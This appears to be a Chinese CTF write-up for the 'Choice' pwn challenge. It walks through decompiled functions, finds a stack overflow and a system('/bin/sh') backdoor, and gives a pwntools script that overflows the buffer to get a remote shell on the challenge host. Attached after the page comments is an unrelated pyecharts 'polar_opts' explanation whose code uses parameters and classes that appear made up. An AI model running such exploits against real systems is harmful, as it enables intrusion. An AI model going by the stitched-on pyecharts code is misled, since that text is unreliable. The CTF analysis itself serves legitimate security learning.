Polar_D&N_PWN_Choice

一、查看题目信息

$ file Choice
$ checksec Choice

程序为64位elf文件,没有开启任何保护。

二、题目分析

将程序放到ida 里分析,查看main()函数:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-4h] BYREF
 
  init(argc, argv, envp);
  puts(&s);
  puts("Menu:");
  puts(a1);
  puts(a2);
  puts(a3);
  __isoc99_scanf((__int64)&unk_400A75, (__int64)&v4);
  if ( v4 == 1 )
  {
    Data1();
  }
  else if ( v4 == 2 )
  {
    Data2();
  }
  else
  {
    Data3();
  }
  return 0;
}

发现Data1()函数和Data2()和Data3()函数。

先进入`Data1()函数中:

int Data1()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF
 
  puts(&byte_400A78);
  read(0, buf, 0x35uLL);
  return printf(&format);
}
​

没有发现问题。

进入Data2()

int Data2()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF
 
  puts(&byte_400AA8);
  read(0, buf, 0x35uLL);
  return printf(&format);
}

接着进入Data3()函数中分析:

int Data3()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF
 
  puts(&byte_400AD0);
  read(0, buf, 0x50uLL);
  return printf(&format);
}

我们分别点开函数发现,三者中唯有Data3存在足够的溢出可以使我们进一步操作。

同时我们发现函数中存在后门函数shell

int Shell()
{
  return system("/bin/sh");
}

三、解题思路

那么,这道题的大致思路已经明了

1、选择Data3(见ps)

2、构造栈溢出

3、getshell

那么久直接开始写脚本吧

四、编写脚本

EXP

from pwn import*
r = remote("123.60.135.228",2144)
r.sendline("9")
shell = 0x004007bd
payload = 'a' * 48 + 'a' * 8
payload += p64(shell)
r.sendline(payload)
r.interactive()
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
以下是关于polar_opts的介绍和演示: polar_opts是pyecharts中极坐标图的配置项,可以通过设置polar_angleaxis_opts和polar_radiusaxis_opts来调整极坐标图的角度轴和半径轴的样式和属性。例如,可以通过设置polar_angleaxis_opts的boundary_gap属性来控制角度轴的起始位置和结束位置是否留白,还可以通过设置polar_radiusaxis_opts的min和max属性来控制半径轴的最小值和最大值。 以下是一个简单的例子,展示如何使用polar_opts来绘制一个极坐标图: ```python from pyecharts import options as opts from pyecharts.charts import Polar data = [("A", 10), ("B", 20), ("C", 30), ("D", 40), ("E", 50)] angle_data = [item[0] for item in data] radius_data = [item[1] for item in data] polar = ( Polar() .add("", [list(z) for z in zip(angle_data, radius_data)]) .set_global_opts(title_opts=opts.TitleOpts(title="极坐标图")) .set_series_opts(label_opts=opts.LabelOpts(is_show=False)) .set_colors(["#FF3333", "#FFFF33", "#33FF33", "#33FFFF", "#3333FF"]) .set_polar( radius="60%", center=["50%", "50%"], start_angle=0, split_number=5, name_gap=20, boundary_gap=True, scale_tick=1, area_color_opacity=0.5, areastyle_opts=opts.AreaStyleOpts(opacity=0.5), angleaxis_opts=opts.AngleAxisOpts( boundary_gap=True, start_angle=0, min_interval=10, max_interval=30, axislabel_opts=opts.LabelOpts(is_show=True, color="#333"), axisline_opts=opts.LineOpts(is_show=True, linestyle="dashed", color="#aaa"), axistick_opts=opts.AxisTickOpts(is_show=True, length=5, linestyle="solid", color="#aaa"), splitline_opts=opts.SplitLineOpts(is_show=True, linestyle="dashed", color="#aaa"), ), radiusaxis_opts=opts.RadiusAxisOpts( min_=0, max_=50, interval=10, axislabel_opts=opts.LabelOpts(is_show=True, color="#333"), axisline_opts=opts.LineOpts(is_show=True, linestyle="dashed", color="#aaa"), axistick_opts=opts.AxisTickOpts(is_show=True, length=5, linestyle="solid", color="#aaa"), splitline_opts=opts.SplitLineOpts(is_show=True, linestyle="dashed", color="#aaa"), ), ) ) polar.render_notebook() ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值